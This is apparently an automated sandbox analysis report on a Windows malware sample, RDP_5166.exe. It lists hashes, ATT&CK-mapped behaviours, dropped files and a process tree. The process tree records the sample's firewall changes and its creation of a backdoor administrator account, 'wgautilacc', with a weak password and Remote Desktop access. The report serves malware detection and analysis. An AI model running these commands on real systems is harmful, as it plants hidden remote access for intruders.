Analysis

  • max time kernel
    135s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-08-2024 06:25

General

  • Target

    $TEMP/RDP_5166.exe

  • Size

    569KB

  • MD5

    a46ab91afbba2a657bce8e961bf2632f

  • SHA1

    7c1a484a381fc4915c6904358f7a3611ad9323d2

  • SHA256

    740b1c1498915271214824fa1c5f1a373efdcf13adee853f70d582cec353a1a1

  • SHA512

    a1a519c05dea2ab7db4dcea2945c6afb5292d1701404b0de7c530df13ffe81db986fd9c7d703225178f9df4468c17c9db0a78029ae87112e35c51490576a17c4

  • SSDEEP

    12288:8W7IR23s4x7/6GDG9e9WJX08vV0CjUsZl4VXqnxq:h7J5D6GDGc9WJk8d0wLIaq

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
  • Allows Network login with blank passwords 1 TTPs 1 IoCs

    Allows local user accounts with blank passwords to access device from the network.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies WinLogon 2 TTPs 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe
    "C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe"
    1⤵
    • Allows Network login with blank passwords
    • Checks computer location settings
    • Loads dropped DLL
    • Modifies WinLogon
    • Hide Artifacts: Hidden Users
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4556
    • C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe
      "C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe" -i
      2⤵
      • Server Software Component: Terminal Services DLL
      • Executes dropped EXE
      • Modifies WinLogon
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\SYSTEM32\netsh.exe
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:3312
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:4356
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:1688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4640
      • C:\Windows\SysWOW64\net.exe
        net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2788
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup "Administrators" "wgautilacc" /add & net localgroup "Remote Desktop Users" "wgautilacc" /add
      2⤵
      • Remote Service Session Hijacking: RDP Hijacking
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\SysWOW64\net.exe
        net localgroup "Administrators" "wgautilacc" /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:888
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup "Administrators" "wgautilacc" /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2556
      • C:\Windows\SysWOW64\net.exe
        net localgroup "Remote Desktop Users" "wgautilacc" /add
        3⤵
        • Remote Service Session Hijacking: RDP Hijacking
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup "Remote Desktop Users" "wgautilacc" /add
          4⤵
          • Remote Service Session Hijacking: RDP Hijacking
          • System Location Discovery: System Language Discovery
          PID:5020
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    1⤵
      PID:1516
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
      1⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1036
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1292,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:8
      1⤵
        PID:4312

Network

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe

        Filesize

        1.5MB

        MD5

        9adce164113ec09d243a78029aecfa2e

        SHA1

        403fb3148345800ca6f0374459e3f6d5ef3b613e

        SHA256

        d577804cf39a7af100747f2dcc00c525a19fa3cb0498885d020cc2a0f10a9436

        SHA512

        c938ccc8b89181e2d5113f31e4adc532b0c62793ba3549dbc7ece22a30219d4f0885e89b1ac01499bed5ea1dd653cbee3b61bdb0883d9980ea4c518ac70b01f5

      • C:\Users\Admin\AppData\Local\Temp\nsh4B1E.tmp\System.dll

        Filesize

        11KB

        MD5

        0063d48afe5a0cdc02833145667b6641

        SHA1

        e7eb614805d183ecb1127c62decb1a6be1b4f7a8

        SHA256

        ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

        SHA512

        71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

      • C:\Users\Admin\AppData\Local\Temp\nsh4B1E.tmp\nsExec.dll

        Filesize

        6KB

        MD5

        293165db1e46070410b4209519e67494

        SHA1

        777b96a4f74b6c34d43a4e7c7e656757d1c97f01

        SHA256

        49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

        SHA512

        97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

      • \??\c:\program files\icosahedron\disavow.dll

        Filesize

        102KB

        MD5

        de5ab87a7fcc1d9225feed2185fa0d08

        SHA1

        9184073717812324999601bf3dbfa89c52f2ce4d

        SHA256

        54fa75eadbadd1c86ca950ae93b70e5512dea629d103fdf5eaa1b070a32068ac

        SHA512

        226819782e68b051003f7f47b4e1d5a6b6d52713ee4bff6f740fbc356793d8e526663c7c51f230b44ac04449e4ca79c28a8454f20badf3f322d8f7a40c87851f

      • \??\c:\program files\icosahedron\disavow.ini

        Filesize

        181KB

        MD5

        1d63f27fe33bcf7795ffbee0576d76aa

        SHA1

        6f3c71f8ecd983d54502798c190e02ebf5e6a1e4

        SHA256

        57d03a2a794019bea83f1e866c83ea48db91feb2599036435db291e098f7ff7a

        SHA512

        871906a16812dc05ba75208e2ef84838f003bc082c9d27e12783e97a18a8cd96daecb5cae92f4429df74414cd203e522ec6749ce4c9d8a130e9fa35c782e3a78

      • memory/2824-40-0x0000000000400000-0x000000000058F000-memory.dmp

        Filesize

        1.6MB